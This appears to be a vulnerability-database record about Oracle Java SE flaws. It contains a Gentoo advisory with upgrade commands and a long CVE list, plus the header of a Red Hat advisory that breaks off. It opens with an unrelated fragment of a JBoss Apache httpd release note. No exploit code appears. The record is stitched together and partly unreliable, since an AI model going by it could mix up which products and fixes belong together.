This release adds the new Apache HTTP Server 2.4.29 packages that are part
of the JBoss Core Services offering.
This release serves as a replacement for Red Hat JBoss Core Services
Apache HTTP Server 2.4.23, and includes bug fixes and enhancements. Refer
to the Release Notes for information on the most significant bug fixes,
enhancements and component upgrades included in this release. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):
JBCS-373 - Errata for httpd 2.4.29 GA RHEL 7
7 |
|
var-201304-0373
|
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier and 6 Update 43 and earlier allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Deployment. (DoS) An attack may be carried out. Oracle Java SE is prone to a remote vulnerability in Java Runtime Environment.
This issue affects the 'Deployment' sub-component.
This vulnerability affects the following supported versions:
7 Update 17 , 6 Update 43. In a typical operating environment, these are of low security risk as
the runtime is not used on untrusted applets. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201401-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Oracle JRE/JDK: Multiple vulnerabilities
Date: January 27, 2014
Bugs: #404071, #421073, #433094, #438706, #451206, #455174,
#458444, #460360, #466212, #473830, #473980, #488210, #498148
ID: 201401-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in the Oracle JRE/JDK,
allowing attackers to cause unspecified impact.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/sun-jdk <= 1.6.0.45 Vulnerable!
2 dev-java/oracle-jdk-bin < 1.7.0.51 >= 1.7.0.51 *
3 dev-java/sun-jre-bin <= 1.6.0.45 Vulnerable!
4 dev-java/oracle-jre-bin < 1.7.0.51 >= 1.7.0.51 *
5 app-emulation/emul-linux-x86-java
< 1.7.0.51 >= 1.7.0.51 *
-------------------------------------------------------------------
NOTE: Certain packages are still vulnerable. Users should migrate
to another package if one is available or wait for the
existing packages to be marked stable by their
architecture maintainers.
-------------------------------------------------------------------
NOTE: Packages marked with asterisks require manual intervention!
-------------------------------------------------------------------
5 affected packages
Description
===========
Multiple vulnerabilities have been reported in the Oracle Java
implementation. Please review the CVE identifiers referenced below for
details.
Impact
======
An unauthenticated, remote attacker could exploit these vulnerabilities
to execute arbitrary code.
Furthermore, a local or remote attacker could exploit these
vulnerabilities to cause unspecified impact, possibly including remote
execution of arbitrary code.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Oracle JDK 1.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.7.0.51"
All Oracle JRE 1.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.7.0.51"
All users of the precompiled 32-bit Oracle JRE should upgrade to the
latest version:
# emerge --sync
# emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.7.0.51"
All Sun Microsystems JDK/JRE 1.6 users are suggested to upgrade to one
of the newer Oracle packages like dev-java/oracle-jdk-bin or
dev-java/oracle-jre-bin or choose another alternative we provide; eg.
the IBM JDK/JRE or the open source IcedTea.
References
==========
[ 1 ] CVE-2011-3563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563
[ 2 ] CVE-2011-5035
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035
[ 3 ] CVE-2012-0497
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497
[ 4 ] CVE-2012-0498
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0498
[ 5 ] CVE-2012-0499
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0499
[ 6 ] CVE-2012-0500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0500
[ 7 ] CVE-2012-0501
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501
[ 8 ] CVE-2012-0502
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502
[ 9 ] CVE-2012-0503
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503
[ 10 ] CVE-2012-0504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0504
[ 11 ] CVE-2012-0505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505
[ 12 ] CVE-2012-0506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506
[ 13 ] CVE-2012-0507
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0507
[ 14 ] CVE-2012-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547
[ 15 ] CVE-2012-1531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1531
[ 16 ] CVE-2012-1532
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1532
[ 17 ] CVE-2012-1533
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1533
[ 18 ] CVE-2012-1541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1541
[ 19 ] CVE-2012-1682
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1682
[ 20 ] CVE-2012-1711
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711
[ 21 ] CVE-2012-1713
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713
[ 22 ] CVE-2012-1716
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716
[ 23 ] CVE-2012-1717
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717
[ 24 ] CVE-2012-1718
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718
[ 25 ] CVE-2012-1719
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719
[ 26 ] CVE-2012-1721
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1721
[ 27 ] CVE-2012-1722
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1722
[ 28 ] CVE-2012-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723
[ 29 ] CVE-2012-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724
[ 30 ] CVE-2012-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725
[ 31 ] CVE-2012-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726
[ 32 ] CVE-2012-3136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3136
[ 33 ] CVE-2012-3143
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3143
[ 34 ] CVE-2012-3159
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3159
[ 35 ] CVE-2012-3174
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3174
[ 36 ] CVE-2012-3213
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3213
[ 37 ] CVE-2012-3216
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216
[ 38 ] CVE-2012-3342
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3342
[ 39 ] CVE-2012-4416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416
[ 40 ] CVE-2012-4681
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4681
[ 41 ] CVE-2012-5067
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5067
[ 42 ] CVE-2012-5068
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068
[ 43 ] CVE-2012-5069
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069
[ 44 ] CVE-2012-5070
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070
[ 45 ] CVE-2012-5071
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071
[ 46 ] CVE-2012-5072
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072
[ 47 ] CVE-2012-5073
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073
[ 48 ] CVE-2012-5074
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074
[ 49 ] CVE-2012-5075
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075
[ 50 ] CVE-2012-5076
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076
[ 51 ] CVE-2012-5077
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077
[ 52 ] CVE-2012-5079
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5079
[ 53 ] CVE-2012-5081
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081
[ 54 ] CVE-2012-5083
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5083
[ 55 ] CVE-2012-5084
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084
[ 56 ] CVE-2012-5085
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085
[ 57 ] CVE-2012-5086
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086
[ 58 ] CVE-2012-5087
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087
[ 59 ] CVE-2012-5088
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5088
[ 60 ] CVE-2012-5089
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089
[ 61 ] CVE-2013-0169
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169
[ 62 ] CVE-2013-0351
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0351
[ 63 ] CVE-2013-0401
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401
[ 64 ] CVE-2013-0402
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0402
[ 65 ] CVE-2013-0409
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0409
[ 66 ] CVE-2013-0419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0419
[ 67 ] CVE-2013-0422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0422
[ 68 ] CVE-2013-0423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0423
[ 69 ] CVE-2013-0430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0430
[ 70 ] CVE-2013-0437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0437
[ 71 ] CVE-2013-0438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0438
[ 72 ] CVE-2013-0445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0445
[ 73 ] CVE-2013-0446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0446
[ 74 ] CVE-2013-0448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0448
[ 75 ] CVE-2013-0449
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0449
[ 76 ] CVE-2013-0809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809
[ 77 ] CVE-2013-1473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1473
[ 78 ] CVE-2013-1479
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1479
[ 79 ] CVE-2013-1481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1481
[ 80 ] CVE-2013-1484
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484
[ 81 ] CVE-2013-1485
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485
[ 82 ] CVE-2013-1486
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486
[ 83 ] CVE-2013-1487
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1487
[ 84 ] CVE-2013-1488
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488
[ 85 ] CVE-2013-1491
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1491
[ 86 ] CVE-2013-1493
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493
[ 87 ] CVE-2013-1500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500
[ 88 ] CVE-2013-1518
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518
[ 89 ] CVE-2013-1537
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537
[ 90 ] CVE-2013-1540
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1540
[ 91 ] CVE-2013-1557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557
[ 92 ] CVE-2013-1558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1558
[ 93 ] CVE-2013-1561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1561
[ 94 ] CVE-2013-1563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1563
[ 95 ] CVE-2013-1564
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1564
[ 96 ] CVE-2013-1569
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569
[ 97 ] CVE-2013-1571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571
[ 98 ] CVE-2013-2383
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383
[ 99 ] CVE-2013-2384
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384
[ 100 ] CVE-2013-2394
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2394
[ 101 ] CVE-2013-2400
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2400
[ 102 ] CVE-2013-2407
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407
[ 103 ] CVE-2013-2412
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412
[ 104 ] CVE-2013-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2414
[ 105 ] CVE-2013-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415
[ 106 ] CVE-2013-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2416
[ 107 ] CVE-2013-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417
[ 108 ] CVE-2013-2418
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2418
[ 109 ] CVE-2013-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419
[ 110 ] CVE-2013-2420
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420
[ 111 ] CVE-2013-2421
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421
[ 112 ] CVE-2013-2422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422
[ 113 ] CVE-2013-2423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423
[ 114 ] CVE-2013-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424
[ 115 ] CVE-2013-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2425
[ 116 ] CVE-2013-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426
[ 117 ] CVE-2013-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2427
[ 118 ] CVE-2013-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2428
[ 119 ] CVE-2013-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429
[ 120 ] CVE-2013-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430
[ 121 ] CVE-2013-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431
[ 122 ] CVE-2013-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2432
[ 123 ] CVE-2013-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2433
[ 124 ] CVE-2013-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2434
[ 125 ] CVE-2013-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2435
[ 126 ] CVE-2013-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436
[ 127 ] CVE-2013-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2437
[ 128 ] CVE-2013-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2438
[ 129 ] CVE-2013-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2439
[ 130 ] CVE-2013-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2440
[ 131 ] CVE-2013-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2442
[ 132 ] CVE-2013-2443
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443
[ 133 ] CVE-2013-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444
[ 134 ] CVE-2013-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445
[ 135 ] CVE-2013-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446
[ 136 ] CVE-2013-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447
[ 137 ] CVE-2013-2448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448
[ 138 ] CVE-2013-2449
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449
[ 139 ] CVE-2013-2450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450
[ 140 ] CVE-2013-2451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451
[ 141 ] CVE-2013-2452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452
[ 142 ] CVE-2013-2453
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453
[ 143 ] CVE-2013-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454
[ 144 ] CVE-2013-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455
[ 145 ] CVE-2013-2456
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456
[ 146 ] CVE-2013-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457
[ 147 ] CVE-2013-2458
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458
[ 148 ] CVE-2013-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459
[ 149 ] CVE-2013-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460
[ 150 ] CVE-2013-2461
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461
[ 151 ] CVE-2013-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2462
[ 152 ] CVE-2013-2463
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463
[ 153 ] CVE-2013-2464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2464
[ 154 ] CVE-2013-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465
[ 155 ] CVE-2013-2466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2466
[ 156 ] CVE-2013-2467
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2467
[ 157 ] CVE-2013-2468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2468
[ 158 ] CVE-2013-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469
[ 159 ] CVE-2013-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470
[ 160 ] CVE-2013-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471
[ 161 ] CVE-2013-2472
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472
[ 162 ] CVE-2013-2473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473
[ 163 ] CVE-2013-3743
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3743
[ 164 ] CVE-2013-3744
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3744
[ 165 ] CVE-2013-3829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829
[ 166 ] CVE-2013-5772
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772
[ 167 ] CVE-2013-5774
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774
[ 168 ] CVE-2013-5775
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5775
[ 169 ] CVE-2013-5776
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5776
[ 170 ] CVE-2013-5777
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5777
[ 171 ] CVE-2013-5778
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778
[ 172 ] CVE-2013-5780
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780
[ 173 ] CVE-2013-5782
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782
[ 174 ] CVE-2013-5783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783
[ 175 ] CVE-2013-5784
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784
[ 176 ] CVE-2013-5787
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5787
[ 177 ] CVE-2013-5788
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5788
[ 178 ] CVE-2013-5789
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5789
[ 179 ] CVE-2013-5790
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790
[ 180 ] CVE-2013-5797
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797
[ 181 ] CVE-2013-5800
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800
[ 182 ] CVE-2013-5801
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5801
[ 183 ] CVE-2013-5802
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802
[ 184 ] CVE-2013-5803
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803
[ 185 ] CVE-2013-5804
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804
[ 186 ] CVE-2013-5805
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805
[ 187 ] CVE-2013-5806
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806
[ 188 ] CVE-2013-5809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809
[ 189 ] CVE-2013-5810
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5810
[ 190 ] CVE-2013-5812
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5812
[ 191 ] CVE-2013-5814
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814
[ 192 ] CVE-2013-5817
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817
[ 193 ] CVE-2013-5818
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5818
[ 194 ] CVE-2013-5819
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5819
[ 195 ] CVE-2013-5820
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820
[ 196 ] CVE-2013-5823
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823
[ 197 ] CVE-2013-5824
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5824
[ 198 ] CVE-2013-5825
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825
[ 199 ] CVE-2013-5829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829
[ 200 ] CVE-2013-5830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830
[ 201 ] CVE-2013-5831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5831
[ 202 ] CVE-2013-5832
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5832
[ 203 ] CVE-2013-5838
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5838
[ 204 ] CVE-2013-5840
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840
[ 205 ] CVE-2013-5842
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842
[ 206 ] CVE-2013-5843
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5843
[ 207 ] CVE-2013-5844
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5844
[ 208 ] CVE-2013-5846
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5846
[ 209 ] CVE-2013-5848
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5848
[ 210 ] CVE-2013-5849
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849
[ 211 ] CVE-2013-5850
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850
[ 212 ] CVE-2013-5851
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851
[ 213 ] CVE-2013-5852
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5852
[ 214 ] CVE-2013-5854
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5854
[ 215 ] CVE-2013-5870
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5870
[ 216 ] CVE-2013-5878
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5878
[ 217 ] CVE-2013-5887
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5887
[ 218 ] CVE-2013-5888
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5888
[ 219 ] CVE-2013-5889
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5889
[ 220 ] CVE-2013-5893
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5893
[ 221 ] CVE-2013-5895
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5895
[ 222 ] CVE-2013-5896
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5896
[ 223 ] CVE-2013-5898
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5898
[ 224 ] CVE-2013-5899
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5899
[ 225 ] CVE-2013-5902
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5902
[ 226 ] CVE-2013-5904
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5904
[ 227 ] CVE-2013-5905
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5905
[ 228 ] CVE-2013-5906
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5906
[ 229 ] CVE-2013-5907
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5907
[ 230 ] CVE-2013-5910
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5910
[ 231 ] CVE-2014-0368
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0368
[ 232 ] CVE-2014-0373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0373
[ 233 ] CVE-2014-0375
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0375
[ 234 ] CVE-2014-0376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0376
[ 235 ] CVE-2014-0382
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0382
[ 236 ] CVE-2014-0385
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0385
[ 237 ] CVE-2014-0387
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0387
[ 238 ] CVE-2014-0403
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0403
[ 239 ] CVE-2014-0408
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0408
[ 240 ] CVE-2014-0410
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0410
[ 241 ] CVE-2014-0411
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0411
[ 242 ] CVE-2014-0415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0415
[ 243 ] CVE-2014-0416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0416
[ 244 ] CVE-2014-0417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0417
[ 245 ] CVE-2014-0418
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0418
[ 246 ] CVE-2014-0422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0422
[ 247 ] CVE-2014-0423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0423
[ 248 ] CVE-2014-0424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0424
[ 249 ] CVE-2014-0428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0428
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201401-30.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: java-1.7.0-oracle security update
Advisory ID: RHSA-2013:0757-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0757.html
Issue date: 2013-04-18
CVE Names: CVE-2013-0401 CVE-2013-0402 CVE-2013-1488
CVE-2013-1491 CVE-2013-1518 CVE-2013-1537
CVE-2013-1540 CVE-2013-1557 CVE-2013-1558
CVE-2013-1561 CVE-2013-1563 CVE-2013-1564
